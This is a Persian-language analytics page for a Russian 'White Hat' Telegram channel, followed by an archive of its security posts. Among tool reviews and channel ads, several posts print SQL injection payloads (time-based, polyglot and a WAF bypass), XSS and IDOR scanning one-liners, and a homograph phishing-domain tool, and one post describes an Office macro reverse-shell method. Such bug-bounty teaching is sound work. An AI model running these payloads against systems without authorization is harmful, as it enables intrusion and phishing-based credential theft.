اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
White Hat
رفتن به کانال در Telegram
Пишем про информационную безопасность и белый хакинг. Сотрудничество: @workhouse_price Канал на бирже: https://telega.in/c/kind_hack Канал в реестре РКН: https://clck.ru/3FtTnR
نمایش بیشتر📈 تحلیل کانال تلگرام White Hat
کانال White Hat (@kind_hack) در بخش زبانی روسی بازیگری فعال است. در حال حاضر جامعه شامل 11 791 مشترک است و جایگاه 10 597 را در دسته فناوری و برنامهها و رتبه 55 585 را در منطقه روسيا دارد.
📊 شاخصهای مخاطب و پویایی
از زمان ایجاد در невідомо، پروژه رشد سریعی داشته و 11 791 مشترک جذب کرده است.
بر اساس آخرین دادهها در تاریخ 25 ژوئن, 2026، کانال فعالیت پایداری دارد. در ۳۰ روز گذشته تغییر اعضا برابر 384 و در ۲۴ ساعت گذشته برابر 13 بوده و همچنان دسترسی گستردهای حفظ شده است.
- وضعیت تأیید: تأیید نشده
- نرخ تعامل (ER): میانگین تعامل مخاطب 8.32% است و در ۲۴ ساعت نخست پس از انتشار، محتوا معمولاً 3.55% واکنش نسبت به کل مشترکان کسب میکند.
- دسترسی پستها: هر پست به طور میانگین 981 بازدید دریافت میکند. در اولین روز معمولاً 419 بازدید جمعآوری میشود.
- واکنشها و تعامل: مخاطبان بهطور فعال حمایت میکنند؛ میانگین واکنش به هر پست 4 است.
- علایق موضوعی: محتوا بر موضوعات کلیدی مانند взлом, шпаргалка, обнаружение, протокол, хакер تمرکز دارد.
📝 توضیح و سیاست محتوایی
نویسنده این فضا را محل بیان دیدگاههای شخصی توصیف میکند:
“Пишем про информационную безопасность и белый хакинг.
Сотрудничество: @workhouse_price
Канал на бирже: https://telega.in/c/kind_hack
Канал в реестре РКН: https://clck.ru/3FtTnR”
به لطف بهروزرسانیهای پرتکرار (آخرین داده در تاریخ 26 ژوئن, 2026)، کانال همواره بهروز و دارای دسترسی بالاست. تحلیلها نشان میدهد مخاطبان بهطور فعال با محتوا تعامل دارند و آن را به نقطه اثرگذاری مهم در دسته فناوری و برنامهها تبدیل کردهاند.
11 791
مشترکین
+1324 ساعت
+737 روز
+38430 روز
آرشیو پست ها
11 791
⌨ Circadian - фоновый демон GNU/Linux
Инструмент для автоматического запуска приостановки/сна/гибернации GNU/Linux
Circadian использует набор «эвристик простоя», чтобы определить, когда система простаивает.
К ним относятся:
▫️ Действия пользователя в X11 (клавиатура, мышь, полноэкранное воспроизведение)
▫️ Действия пользователя в терминалах (ввод в сеансе PTY/SSH)
▫️ Открытые SSH-соединения
▫️ Открытые соединения SMB/Samba
▫️ Открытые соединения NFS
▫️ Активное воспроизведение звука
▫️ Использование ЦП ниже указанного порога
▫️ Процессы из черного списка
Когда все его эвристики определят, что ваша система бездействовала достаточно долго, Circadian выполнит команду. Обычно это простая приостановка питания, но ее можно настроить на любое желаемое действие.
☝🏻Circadian также может запланировать автоматическое ежедневное пробуждение.
Просто установите время пробуждения в его файле конфигурации, и он будет просыпаться один раз в день в это время (если он еще не проснулся). Это позволяет легко обновлять и создавать резервные копии машины, даже если она редко используется.
📶 Он также может выполнить команду, когда обнаружит, что система вышла из спящего режима, независимо от того, почему она проснулась.
⏺ Ссылка на GitHub
#Linux
11 791
🤛 Омографическая атака для фишинга
Эти атаки известны уже почти 20 лет, в их основе лежит принцип использования в доменных именах символов нелатинских алфавитов, внешне неотличимых от латинских букв.
В результате доменное имя выглядит как tᴡitter.com или clᴏudflare.com, однако переход по нему ведет на фальшивую страницу созданную для похищения логинов и паролей.
Для поиска доступных доменов, можно использовать Ditto - это небольшой инструмент, который принимает доменное имя в качестве входных данных и генерирует все его варианты для омографической атаки.
На выходе получаем список доменов, с отображением какие из них доступны, а какие уже зарегистрированы.
⏺ Ссылка на GitHub
#Web #Phishing
11 791
⏳ Поиск Time-Based уязвимостей с httpx
| Привет, друг. На связи Эллиот.
Когда нужно проверить список доменов на Time-Based уязвимости и лень писать шаблон для Nuclei, можно заюзать httpx с параметрами -timeout, для указания максимального таймаута и -mrt, для вывода только результатов с определенной задержкой.
cat web.list | httpx -silent -path '/sitemap.xml?offset=1%3bSELECT%20IF((8303%3E8302)%2cSLEEP(10)%2c2356)%23' -rt -timeout 20 -mrt '>10'
Аналогично, для заголовков:
cat web.list | httpx -silent -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(10),0))OR" -rt -timeout 20 -mrt '>10'
#Web #SQLi #RCE11 791
🩸 Находим XSS (и не только) на сайте одной командой
Для этого нам потребуется предварительно установить несколько утилит на языке GO (ну и соответсвенно сам GO тоже должен быть установлен).
Первая - gospider, представляющая собой веб-краулер для быстрого сбора URL-адресов, связанных с сайтом.
Вторая - qsreplace. Она принимает на вход URL-адреса и заменяет все значения строки запроса на значение, указанное пользователем.
Третья - dalfox. Это производительный и быстрый инструмент для анализа параметров запроса и выявления различных типов XSS и других базовых уязвимостей.
После установки необходимо заменить строку
https://example.com на адрес тестируемого сайта и выполнить команду:
gospider -s https://example.com -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}' | grep "=" | qsreplace -a | dalfox pipe -o result.txt
#Web #XSS11 791
🏃♂ Простое преобразование вывода в хэш для поиска IDOR
Иногда требуется конвертировать ввод в md5 / base64 / 32 и т.д непосредственно в консоле. Это бывает полезно, особенно когда вы ищите IDOR и конечная точка имеет значение в виде хэша, например:
https://targetdomain.com/user/3bf1114a986ba87ed28fc1b5884fc2f8
Для решения этой задачи, вы можете использовать простой bash-скрипт, совместно с ffuf.
Предположим, у вас есть конечная точка, которая принимает параметр id в виде md5. Мы можем проверить его на IDOR с помощью приведенной ниже команды, которая сгенерирует список чисел от 1 до 1000:
seq 1 1000 | hashit md5 | ffuf -w - -u https://targetdomain.com/user/FUZZ
#Web #IDOR #Bash11 791
Совет на 2023 год: изучите Кибер безопасность
Ежегодно в мире совершается более 1,5 миллионов кибер преступлений, а 98% компаний не знают кому отдать свои деньги, чтобы укрепили их защиту.
На рынке сейчас не хватает более 50.000 специалистов, а средняя зарплата новичка ~ 300.000 рублей.
Здесь не нужно зубрить тонны книг и знать 25 языков программирования, а всего лишь изучить простые технологии.
Cyber Squad — канал №1 про хакинг, где каждый может освоить искусство взлома по готовым бесплатным материалам.
Подписывайся – https://t.me/+wybrBw5C8R00YWQy
11 791
💉Про полезные нагрузки для SQL инъекций
Данная простая полезная нагрузка для SQL-инъекции будет охватывать не менее 3 различных кейсов:
SLEEP(5) /*' or SLEEP(5) or'" or SLEEP(5) or "*/
Немного изменив ее, мы можем добиться отсутствия пробелов, что сделает ее более универсальной:
SLEEP(5)/*'or(SLEEP(5))or'"or(SLEEP(5))or"*/
Немного модифицировав её, вы сможете охватить некоторые другие случаи:
)SLEEP(0.5)(/*')or(SLEEP(0.5))or('")or(SLEEP(0.5))or("*/
Все дело в построении уязвимых SQL-запросов и поиска полезных нагрузок для каждого из них.
Данный список вы можете пополнить самостоятельно. Хорошей практикой будет использование тестовых лабораторий и создание нескольких полезных нагрузок для каждого сценария с использованием различных методов.
Это действительно улучшит ваши навыки работы с SQL-инъекциями и пополнит список рабочих полезных нагрузок в вашем арсенале.
Поэтому перестаньте использовать бесполезные вордлисты на 1к строк, не понимая должным образом, что они делают или как они работают. Помните, что из выбора бесполезного количества в ущерб качеству никогда не выйдет ничего хорошего, кроме потери действительно хороших возможностей.
P.S. Для тестов всего этого прекрасно подойдет sqlfiddle.com, в котором можно создавать и тестировать запросы к БД. Тут пример инъекции с применением полезных нагрузок из поста.
#Web #SQLi11 791
✅ Используем скрытый функционал в свойствах документов Microsoft Office для получения реверс шелла
| Привет, друг. На связи Эллиот
Макросы из офисных документов Windows активно используются злоумышленниками или исследователями безопасности для доставки полезной нагрузки на сервер и компрометации системы.
В статье по ссылке представлен рабочий метод создания макроса для документов Word и Excel и его использование для вызова другого объекта, расположенного в свойствах документа. В видео ниже продемонстрировано получение реверс шелла с помощью этого метода.
⏺ Ссылка на чтиво
⏺ Ссылка на видеоматериал
#Word #Excel #Windows11 791
🆘 _Deanon Club_ в строю 🆘
- Конкурсы
- Обучения
- Секреты Darknet мира
- Раскрытие личностей владельцев Dark проектов
- Для тех кто тут впервые:
Deanon Club, самое масштабное и сильнейшее сообщество "хакеров", которое работает внутри "чёрного" интернета. Мы действуем во благо общества, и ведём активную войну с запрещёнными веществами. Что самое интересное, у нас абсолютно иные подходы и мировоззрение. Оставайтесь, и мы покажем, что нам нет аналогов)
⚠️ Deanon Club вернулся - https://t.me/+GE1S05P6hStkZGFi
11 791
⌨ Практическая платформа для новичков Bug bounty
Бесплатный набор практических заданий от TheXSSRat, которые будут полезны новичкам и помогут вам проверить свои навыки в поиске и эксплуатации распространённых в Bug Bounty уязвимостей, таких как IDOR, XSS, CSRF и логические уязвимости.
Автор также обещает пополнения текущего списка заданий.
⏺ Ссылка на платформу
#Web
11 791
Не хакинг, а ИБ — презерватив в мир интернета
Режим «инкогнито» в браузере вовсе не анонимен, а деньги на твоих банковских счётах вовсе не твои.
Разбираем такие темы как: OSINT, ИБ, белый хакинг, КиберБез
Не хакинг, а ИБ — ты уже не хакер, ты интернет-герой
11 791
⚒ Недавно выпустили плагин BurpSuite, который использует технологии искусственного интеллекта
Плагин генерирует имена для директорий, параметров и возможных файлов на основе запросов. Для генерации BruteForce листа используется OpenAI. Насколько это эффективно предстоит ещё проверить, но в целом — когда идей больше нет, можно обратиться к ней, чтобы получить "креатива".
На скрине показан пример как нейросеть может описать параметры, для отдельно взятого запроса и результат получается довольно достойным.
⏺ Ссылка на GitHub
#BurpSuite
11 791
🔎 Поиск по облачным «хранилищам»
Сегодня предлагаю вам рассмотреть сервис, который осуществляет поиск по таким хранилищам как: Mega, Depositefiles, Dropbox, Turbo Bit, Vip-files и пр. Возможен поиск по 60 наиболее популярным облачным хранилищам.
⏺ Ссылка на инструмент
Если вам необходимо осуществить поиск по менее популярным хранилищам, типа Take File, Anonfiles, Keep2share, Ex-load и пр., то предлагаю рассмотреть другой сервис, который осуществляет поиск по более чем 100 различным ресурсам.
⏺ Ссылка на инструмент
11 791
Хочешь быть на шаг впереди киберпреступников?
Присоединяйся к каналу Hack Proof и узнавай о реальных кейсах в сфере Информационной безопасности.
Мы погружаемся в мир OSINT, социальной инженерии и обозреваем инструменты с github, чтобы помочь тебе защититься и сохранить анонимность в сети!
11 791
Хочешь быть на шаг впереди киберпреступников?
Присоединяйся к каналу Hack Proof и узнавай о реальных кейсах в сфере Информационной безопасности.
Мы погружаемся в мир OSINT, социальной инженерии и обозреваем инструменты с github, чтобы помочь тебе защититься и сохранить анонимность в сети!
11 791
💉 Совет по обходу WAF для SQL-инъекций
Если вы пытаетесь выполнить SQL инъекцию и ее блокирует WAF, попробуйте использовать особенности Е-нотации в синтаксисе SQL. Таким образом, вы можете обфусцировать свой запрос и оказаться вне поля зрения WAF.
https://example.com/getUser?name=' or "=' (403 Forbidden)
https://example.com/getUser?name=' or 1337.e(")=' (200 OK)
#Web #WAF #SQLi11 791
📑 Пассивный сбор URL адресов и ответов сервера
Любой, кто занимается Bug Bounty, скорее всего, использовал waybackurls. Этот инструмент получает URL-адреса с web.archive.org и дополнительные ссылки (если таковые имеются) из index.commoncrawl.org. Вы, вероятно, также использовали gau, который находит URL-адреса из Wayback архива, Common Crawl, а также из Alien Vault и URLScan.
Инструмент под название waymore также получает URL-адреса из всех этих источников. Но самое главное различие между waymore и другими инструментами заключается в том, что он может загружать из архива ещё и ответы от сервера на эти URL-адреса из Wayback Machine, чтобы затем искать еще больше ссылок, комментариев разработчиков, дополнительных параметров и т.д.
Вы можете поближе познакомиться с инструментом на его GitHub странице. Можно также заглянуть в видео по ссылке, где показан пример его работы и использование другой утилиты от этого автора, под названием xnLinkFinder, для поиска URL адресов уже в собранных ответах сервера.
P.S.
Кстати, кроме xnLinkFinder можно ещё заюзать trufflehog для поиска секретов:
trufflehog filesystem --directory=/results/domain.com
#Recon11 791
📃 Механизмы закрепления в Windows системах
Репозиторий, представленный ниже, содержит информацию о механизмах закрепления в системах Windows. Большая часть из них хорошо известна в течение многих лет и активно используется в различных сценариях.
Репозиторий появился недавно и автор обещает активно пополнять его со временем.
💬 Ссылка на GitHub
#Windows
11 791
🗄 Вариант поиска уязвимостей при пассивном анализе
Одним из шагов, которые я предпринимаю при исследовании нового домена, является получение целевых конечных точек и URL-адресов, выявленных третьими сторонами. Это можно сделать с помощью инструментов с открытым исходным кодом, таких как gau.
Инструмент getallurls (gau) извлекает известные URL-адреса из AlienVault's Open Threat Exchange, Wayback Machine и Common Crawl для любого заданного домена. Выполняем команду:
printf site.com | gau
После этого начинаем вручную анализировать конечные точки и URL-адреса, уделяя особое внимание некоторым чувствительным ключевым словам:
invoice, discount, promo-code, join, redirect, reset_password, reset-password, password, TrackOrder, token, invite.
В примере на фото ниже привлекает внимание слово invite. После нажатия по данной ссылке открывается страница регистрации. После создания новой учетной записи с личной электронной почтой (@gmail.com) сайт просто перенаправляет на страницу компании внутри целевого приложения, содержащую всех приглашенных сотрудников и конфиденциальную информацию.
#Web #Leak11 791
📌 Автоматизация JavaScript-разведки
| Привет, друг. На связи Эллиот.
Основные этапы JavaScript-разведки в Bug Bounty это:
1 - Сбор файлов JS от цели.
2 - Поиск конечных точек из файлов JS.
3 - Поиск секретов в файлах JS.
4 - Получение файлов JS локально для ручного анализа.
7 - Извлечение имен переменных из файлов JS для проверки на XSS.
8 - Сканировать файлов JS на наличие DomXSS.
Для автоматизация вышеперечисленных и некоторых других действий есть неплохой инструмент, под названием JSFScan. Достаточно передать ему список поддоменов и задать опции в соответствии с вашими предпочтениями.
Ниже представлено видео, демонстрирующее процесс работы с данным инструментом.
⏺ Ссылка на GitHub
⏺ Ссылка на видео
#Web #JS